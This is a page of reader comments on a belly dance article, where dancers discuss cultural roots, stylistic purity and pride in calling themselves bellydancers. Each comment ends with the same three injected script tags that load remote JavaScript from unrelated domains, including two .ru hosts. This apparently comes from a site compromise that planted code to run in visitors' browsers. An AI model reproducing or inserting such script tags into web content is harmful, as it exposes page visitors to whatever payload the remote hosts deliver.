As we are a melting pot of just about every culture so too we reflect it in our dance, as does every other kind of artist, be they musician, singer, painter, actor, and/or writer. For the record I am second generation American, my roots are Russian and Lithuanian. I enjoy all forms of Belly Dance and intend to revel in them all. I celebrate all my Sisters in the Dance! <script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script>

You know what though you are absolutely right, I don't have to because I know how much I adore it and how gorgeous belly dance is. Sometimes it's hard not to think about what others may think or feel but wait-how does it make ME feel? Absolutely sublime!!! I also find myself throwing in a shimmy or two or sliding in some snake arms to non belly dance music but lately all music just pulls out the belly dancer in me. Like you I am more proud as each day passes to call myself a "Belly Dancer!!!!!" xox ~J~<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script>

We would do well to ask ourselves a few questions: 1. what is "stylistic purity"and what is it's relevance and importance to us. 2. How nescessary is it to effective communication and emotional content. 3. Are we perfoming "high art" or common; i.e. Royal Ballet or square dancing. 4.Do we percieve of it as an art of personal expression, or a group effort. The perception of the world at large is something that we can not change except in a gradual way. My feeling is that it is far more important to define your art personally and let that change the world. rmc btw- nice photo <script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script>

I knew that this was not something that I held inside alone. I knew that many of my sisters in the dance were struggling to identify themselves. If we dance with respect for ourselves and our art, belly dancer can be a revered occupation for even those outside our community. Peace.<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script>

Terrific piece. Also, it was great to read something by a fellow "Boricua" bellydancer. !Uepa! --Naia<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script>

For a very long time I use to feel an anxiety to just flat out say "I'm a bellydancer" without a need of explaination. Something about letting it all out to people use to make me concerned that they would judge me differently and stereotype me. I guess I just felt super protective about what I do and love. But I managed to turn that all around, by stop caring about what others thought. Now I have no problem telling others what I love and do professionally. I told myself I would not be afraid to use the term "Bellydancer" because the term means something different to me. It's a term that represents a powerful love that is almost impossible to hide. Don't we all turn our heads with ANY mention of bellydance, come on use the term and own the it. I'm a bellydancer-- I'm a bellydancer-- I'm a bellydancer! Scream it on a roof top if you have to... lol<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script>

I personally don't want to be limited on one type of dance. It's fun to explore all belly dancing styles, then you can say 'Yeah,I do it all!'<script src=http://www.gbradw.com/ngg.js></script><script src=http://www.4cnw.ru/ngg.js></script><script src=http://www.loopk.ru/script.js></script>
